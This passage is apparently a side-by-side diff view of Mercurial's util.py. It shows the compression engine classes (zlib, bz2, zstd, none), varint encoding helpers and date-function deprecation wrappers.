3597 3603 insize = len(data)
3598 3604 # Caller handles empty input case.
3599 3605 assert insize > 0
3600 3606
3601 3607 if insize < 44:
3602 3608 return None
3603 3609
3604 3610 elif insize <= 1000000:
3605 3611 compressed = zlib.compress(data)
3606 3612 if len(compressed) < insize:
3607 3613 return compressed
3608 3614 return None
3609 3615
3610 3616 # zlib makes an internal copy of the input buffer, doubling
3611 3617 # memory usage for large inputs. So do streaming compression
3612 3618 # on large inputs.
3613 3619 else:
3614 3620 z = zlib.compressobj()
3615 3621 parts = []
3616 3622 pos = 0
3617 3623 while pos < insize:
3618 3624 pos2 = pos + 2**20
3619 3625 parts.append(z.compress(data[pos:pos2]))
3620 3626 pos = pos2
3621 3627 parts.append(z.flush())
3622 3628
3623 3629 if sum(map(len, parts)) < insize:
3624 3630 return ''.join(parts)
3625 3631 return None
3626 3632
3627 3633 def decompress(self, data):
3628 3634 try:
3629 3635 return zlib.decompress(data)
3630 3636 except zlib.error as e:
3631 3637 raise error.RevlogError(_('revlog decompress error: %s') %
3632 3638 forcebytestr(e))
3633 3639
3634 3640 def revlogcompressor(self, opts=None):
3635 3641 return self.zlibrevlogcompressor()
3636 3642
3637 3643 compengines.register(_zlibengine())
3638 3644
3639 3645 class _bz2engine(compressionengine):
3640 3646 def name(self):
3641 3647 return 'bz2'
3642 3648
3643 3649 def bundletype(self):
3644 3650 """An algorithm that produces smaller bundles than ``gzip``.
3645 3651
3646 3652 All Mercurial clients should support this format.
3647 3653
3648 3654 This engine will likely produce smaller bundles than ``gzip`` but
3649 3655 will be significantly slower, both during compression and
3650 3656 decompression.
3651 3657
3652 3658 If available, the ``zstd`` engine can yield similar or better
3653 3659 compression at much higher speeds.
3654 3660 """
3655 3661 return 'bzip2', 'BZ'
3656 3662
3657 3663 # We declare a protocol name but don't advertise by default because
3658 3664 # it is slow.
3659 3665 def wireprotosupport(self):
3660 3666 return compewireprotosupport('bzip2', 0, 0)
3661 3667
3662 3668 def compressstream(self, it, opts=None):
3663 3669 opts = opts or {}
3664 3670 z = bz2.BZ2Compressor(opts.get('level', 9))
3665 3671 for chunk in it:
3666 3672 data = z.compress(chunk)
3667 3673 if data:
3668 3674 yield data
3669 3675
3670 3676 yield z.flush()
3671 3677
3672 3678 def decompressorreader(self, fh):
3673 3679 def gen():
3674 3680 d = bz2.BZ2Decompressor()
3675 3681 for chunk in filechunkiter(fh):
3676 3682 yield d.decompress(chunk)
3677 3683
3678 3684 return chunkbuffer(gen())
3679 3685
3680 3686 compengines.register(_bz2engine())
3681 3687
3682 3688 class _truncatedbz2engine(compressionengine):
3683 3689 def name(self):
3684 3690 return 'bz2truncated'
3685 3691
3686 3692 def bundletype(self):
3687 3693 return None, '_truncatedBZ'
3688 3694
3689 3695 # We don't implement compressstream because it is hackily handled elsewhere.
3690 3696
3691 3697 def decompressorreader(self, fh):
3692 3698 def gen():
3693 3699 # The input stream doesn't have the 'BZ' header. So add it back.
3694 3700 d = bz2.BZ2Decompressor()
3695 3701 d.decompress('BZ')
3696 3702 for chunk in filechunkiter(fh):
3697 3703 yield d.decompress(chunk)
3698 3704
3699 3705 return chunkbuffer(gen())
3700 3706
3701 3707 compengines.register(_truncatedbz2engine())
3702 3708
3703 3709 class _noopengine(compressionengine):
3704 3710 def name(self):
3705 3711 return 'none'
3706 3712
3707 3713 def bundletype(self):
3708 3714 """No compression is performed.
3709 3715
3710 3716 Use this compression engine to explicitly disable compression.
3711 3717 """
3712 3718 return 'none', 'UN'
3713 3719
3714 3720 # Clients always support uncompressed payloads. Servers don't because
3715 3721 # unless you are on a fast network, uncompressed payloads can easily
3716 3722 # saturate your network pipe.
3717 3723 def wireprotosupport(self):
3718 3724 return compewireprotosupport('none', 0, 10)
3719 3725
3720 3726 # We don't implement revlogheader because it is handled specially
3721 3727 # in the revlog class.
3722 3728
3723 3729 def compressstream(self, it, opts=None):
3724 3730 return it
3725 3731
3726 3732 def decompressorreader(self, fh):
3727 3733 return fh
3728 3734
3729 3735 class nooprevlogcompressor(object):
3730 3736 def compress(self, data):
3731 3737 return None
3732 3738
3733 3739 def revlogcompressor(self, opts=None):
3734 3740 return self.nooprevlogcompressor()
3735 3741
3736 3742 compengines.register(_noopengine())
3737 3743
3738 3744 class _zstdengine(compressionengine):
3739 3745 def name(self):
3740 3746 return 'zstd'
3741 3747
3742 3748 @propertycache
3743 3749 def _module(self):
3744 3750 # Not all installs have the zstd module available. So defer importing
3745 3751 # until first access.
3746 3752 try:
3747 3753 from . import zstd
3748 3754 # Force delayed import.
3749 3755 zstd.__version__
3750 3756 return zstd
3751 3757 except ImportError:
3752 3758 return None
3753 3759
3754 3760 def available(self):
3755 3761 return bool(self._module)
3756 3762
3757 3763 def bundletype(self):
3758 3764 """A modern compression algorithm that is fast and highly flexible.
3759 3765
3760 3766 Only supported by Mercurial 4.1 and newer clients.
3761 3767
3762 3768 With the default settings, zstd compression is both faster and yields
3763 3769 better compression than ``gzip``. It also frequently yields better
3764 3770 compression than ``bzip2`` while operating at much higher speeds.
3765 3771
3766 3772 If this engine is available and backwards compatibility is not a
3767 3773 concern, it is likely the best available engine.
3768 3774 """
3769 3775 return 'zstd', 'ZS'
3770 3776
3771 3777 def wireprotosupport(self):
3772 3778 return compewireprotosupport('zstd', 50, 50)
3773 3779
3774 3780 def revlogheader(self):
3775 3781 return '\x28'
3776 3782
3777 3783 def compressstream(self, it, opts=None):
3778 3784 opts = opts or {}
3779 3785 # zstd level 3 is almost always significantly faster than zlib
3780 3786 # while providing no worse compression. It strikes a good balance
3781 3787 # between speed and compression.
3782 3788 level = opts.get('level', 3)
3783 3789
3784 3790 zstd = self._module
3785 3791 z = zstd.ZstdCompressor(level=level).compressobj()
3786 3792 for chunk in it:
3787 3793 data = z.compress(chunk)
3788 3794 if data:
3789 3795 yield data
3790 3796
3791 3797 yield z.flush()
3792 3798
3793 3799 def decompressorreader(self, fh):
3794 3800 zstd = self._module
3795 3801 dctx = zstd.ZstdDecompressor()
3796 3802 return chunkbuffer(dctx.read_from(fh))
3797 3803
3798 3804 class zstdrevlogcompressor(object):
3799 3805 def __init__(self, zstd, level=3):
3800 3806 # Writing the content size adds a few bytes to the output. However,
3801 3807 # it allows decompression to be more optimal since we can
3802 3808 # pre-allocate a buffer to hold the result.
3803 3809 self._cctx = zstd.ZstdCompressor(level=level,
3804 3810 write_content_size=True)
3805 3811 self._dctx = zstd.ZstdDecompressor()
3806 3812 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3807 3813 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3808 3814
3809 3815 def compress(self, data):
3810 3816 insize = len(data)
3811 3817 # Caller handles empty input case.
3812 3818 assert insize > 0
3813 3819
3814 3820 if insize < 50:
3815 3821 return None
3816 3822
3817 3823 elif insize <= 1000000:
3818 3824 compressed = self._cctx.compress(data)
3819 3825 if len(compressed) < insize:
3820 3826 return compressed
3821 3827 return None
3822 3828 else:
3823 3829 z = self._cctx.compressobj()
3824 3830 chunks = []
3825 3831 pos = 0
3826 3832 while pos < insize:
3827 3833 pos2 = pos + self._compinsize
3828 3834 chunk = z.compress(data[pos:pos2])
3829 3835 if chunk:
3830 3836 chunks.append(chunk)
3831 3837 pos = pos2
3832 3838 chunks.append(z.flush())
3833 3839
3834 3840 if sum(map(len, chunks)) < insize:
3835 3841 return ''.join(chunks)
3836 3842 return None
3837 3843
3838 3844 def decompress(self, data):
3839 3845 insize = len(data)
3840 3846
3841 3847 try:
3842 3848 # This was measured to be faster than other streaming
3843 3849 # decompressors.
3844 3850 dobj = self._dctx.decompressobj()
3845 3851 chunks = []
3846 3852 pos = 0
3847 3853 while pos < insize:
3848 3854 pos2 = pos + self._decompinsize
3849 3855 chunk = dobj.decompress(data[pos:pos2])
3850 3856 if chunk:
3851 3857 chunks.append(chunk)
3852 3858 pos = pos2
3853 3859 # Frame should be exhausted, so no finish() API.
3854 3860
3855 3861 return ''.join(chunks)
3856 3862 except Exception as e:
3857 3863 raise error.RevlogError(_('revlog decompress error: %s') %
3858 3864 forcebytestr(e))
3859 3865
3860 3866 def revlogcompressor(self, opts=None):
3861 3867 opts = opts or {}
3862 3868 return self.zstdrevlogcompressor(self._module,
3863 3869 level=opts.get('level', 3))
3864 3870
3865 3871 compengines.register(_zstdengine())
3866 3872
3867 3873 def bundlecompressiontopics():
3868 3874 """Obtains a list of available bundle compressions for use in help."""
3869 3875 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3870 3876 items = {}
3871 3877
3872 3878 # We need to format the docstring. So use a dummy object/type to hold it
3873 3879 # rather than mutating the original.
3874 3880 class docobject(object):
3875 3881 pass
3876 3882
3877 3883 for name in compengines:
3878 3884 engine = compengines[name]
3879 3885
3880 3886 if not engine.available():
3881 3887 continue
3882 3888
3883 3889 bt = engine.bundletype()
3884 3890 if not bt or not bt[0]:
3885 3891 continue
3886 3892
3887 3893 doc = pycompat.sysstr('``%s``\n %s') % (
3888 3894 bt[0], engine.bundletype.__doc__)
3889 3895
3890 3896 value = docobject()
3891 3897 value.__doc__ = doc
3892 3898 value._origdoc = engine.bundletype.__doc__
3893 3899 value._origfunc = engine.bundletype
3894 3900
3895 3901 items[bt[0]] = value
3896 3902
3897 3903 return items
3898 3904
3899 3905 i18nfunctions = bundlecompressiontopics().values()
3900 3906
3901 3907 # convenient shortcut
3902 3908 dst = debugstacktrace
3903 3909
3904 3910 def safename(f, tag, ctx, others=None):
3905 3911 """
3906 3912 Generate a name that it is safe to rename f to in the given context.
3907 3913
3908 3914 f: filename to rename
3909 3915 tag: a string tag that will be included in the new name
3910 3916 ctx: a context, in which the new name must not exist
3911 3917 others: a set of other filenames that the new name must not be in
3912 3918
3913 3919 Returns a file name of the form oldname~tag[~number] which does not exist
3914 3920 in the provided context and is not in the set of other names.
3915 3921 """
3916 3922 if others is None:
3917 3923 others = set()
3918 3924
3919 3925 fn = '%s~%s' % (f, tag)
3920 3926 if fn not in ctx and fn not in others:
3921 3927 return fn
3922 3928 for n in itertools.count(1):
3923 3929 fn = '%s~%s~%s' % (f, tag, n)
3924 3930 if fn not in ctx and fn not in others:
3925 3931 return fn
3926 3932
3927 3933 def readexactly(stream, n):
3928 3934 '''read n bytes from stream.read and abort if less was available'''
3929 3935 s = stream.read(n)
3930 3936 if len(s) < n:
3931 3937 raise error.Abort(_("stream ended unexpectedly"
3932 3938 " (got %d bytes, expected %d)")
3933 3939 % (len(s), n))
3934 3940 return s
3935 3941
3936 3942 def uvarintencode(value):
3937 3943 """Encode an unsigned integer value to a varint.
3938 3944
3939 3945 A varint is a variable length integer of 1 or more bytes. Each byte
3940 3946 except the last has the most significant bit set. The lower 7 bits of
3941 3947 each byte store the 2's complement representation, least significant group
3942 3948 first.
3943 3949
3944 3950 >>> uvarintencode(0)
3945 3951 '\\x00'
3946 3952 >>> uvarintencode(1)
3947 3953 '\\x01'
3948 3954 >>> uvarintencode(127)
3949 3955 '\\x7f'
3950 3956 >>> uvarintencode(1337)
3951 3957 '\\xb9\\n'
3952 3958 >>> uvarintencode(65536)
3953 3959 '\\x80\\x80\\x04'
3954 3960 >>> uvarintencode(-1)
3955 3961 Traceback (most recent call last):
3956 3962 ...
3957 3963 ProgrammingError: negative value for uvarint: -1
3958 3964 """
3959 3965 if value < 0:
3960 3966 raise error.ProgrammingError('negative value for uvarint: %d'
3961 3967 % value)
3962 3968 bits = value & 0x7f
3963 3969 value >>= 7
3964 3970 bytes = []
3965 3971 while value:
3966 3972 bytes.append(pycompat.bytechr(0x80 | bits))
3967 3973 bits = value & 0x7f
3968 3974 value >>= 7
3969 3975 bytes.append(pycompat.bytechr(bits))
3970 3976
3971 3977 return ''.join(bytes)
3972 3978
3973 3979 def uvarintdecodestream(fh):
3974 3980 """Decode an unsigned variable length integer from a stream.
3975 3981
3976 3982 The passed argument is anything that has a ``.read(N)`` method.
3977 3983
3978 3984 >>> try:
3979 3985 ... from StringIO import StringIO as BytesIO
3980 3986 ... except ImportError:
3981 3987 ... from io import BytesIO
3982 3988 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3983 3989 0
3984 3990 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3985 3991 1
3986 3992 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3987 3993 127
3988 3994 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3989 3995 1337
3990 3996 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3991 3997 65536
3992 3998 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3993 3999 Traceback (most recent call last):
3994 4000 ...
3995 4001 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3996 4002 """
3997 4003 result = 0
3998 4004 shift = 0
3999 4005 while True:
4000 4006 byte = ord(readexactly(fh, 1))
4001 4007 result |= ((byte & 0x7f) << shift)
4002 4008 if not (byte & 0x80):
4003 4009 return result
4004 4010 shift += 7
4005 4011
4006 4012 ###
4007 4013 # Deprecation warnings for util.py splitting
4008 4014 ###
4009 4015
4010 4016 defaultdateformats = dateutil.defaultdateformats
4011 4017
4012 4018 extendeddateformats = dateutil.extendeddateformats
4013 4019
4014 4020 def makedate(*args, **kwargs):
4015 4021 msg = ("'util.makedate' is deprecated, "
4016 4022 "use 'utils.dateutil.makedate'")
4017 4023 nouideprecwarn(msg, "4.6")
4018 4024 return dateutil.makedate(*args, **kwargs)
4019 4025
4020 4026 def datestr(*args, **kwargs):
4021 4027 msg = ("'util.datestr' is deprecated, "
4022 4028 "use 'utils.dateutil.datestr'")
4023 4029 nouideprecwarn(msg, "4.6")
4024 4030 debugstacktrace()
4025 4031 return dateutil.datestr(*args, **kwargs)
4026 4032
4027 4033 def shortdate(*args, **kwargs):
4028 4034 msg = ("'util.shortdate' is deprecated, "
4029 4035 "use 'utils.dateutil.shortdate'")
4030 4036 nouideprecwarn(msg, "4.6")
4031 4037 return dateutil.shortdate(*args, **kwargs)
4032 4038
4033 4039 def parsetimezone(*args, **kwargs):
4034 4040 msg = ("'util.parsetimezone' is deprecated, "
4035 4041 "use 'utils.dateutil.parsetimezone'")
4036 4042 nouideprecwarn(msg, "4.6")
4037 4043 return dateutil.parsetimezone(*args, **kwargs)
4038 4044
4039 4045 def strdate(*args, **kwargs):
4040 4046 msg = ("'util.strdate' is deprecated, "
4041 4047 "use 'utils.dateutil.strdate'")
4042 4048 nouideprecwarn(msg, "4.6")
4043 4049 return dateutil.strdate(*args, **kwargs)
4044 4050
4045 4051 def parsedate(*args, **kwargs):
4046 4052 msg = ("'util.parsedate' is deprecated, "
4047 4053 "use 'utils.dateutil.parsedate'")
4048 4054 nouideprecwarn(msg, "4.6")
4049 4055 return dateutil.parsedate(*args, **kwargs)
4050 4056
4051 4057 def matchdate(*args, **kwargs):
4052 4058 msg = ("'util.matchdate' is deprecated, "
4053 4059 "use 'utils.dateutil.matchdate'")
4054 4060 nouideprecwarn(msg, "4.6")
4055 4061 return dateutil.matchdate(*args, **kwargs)
General Comments 0
You need to be logged in to leave comments. Login now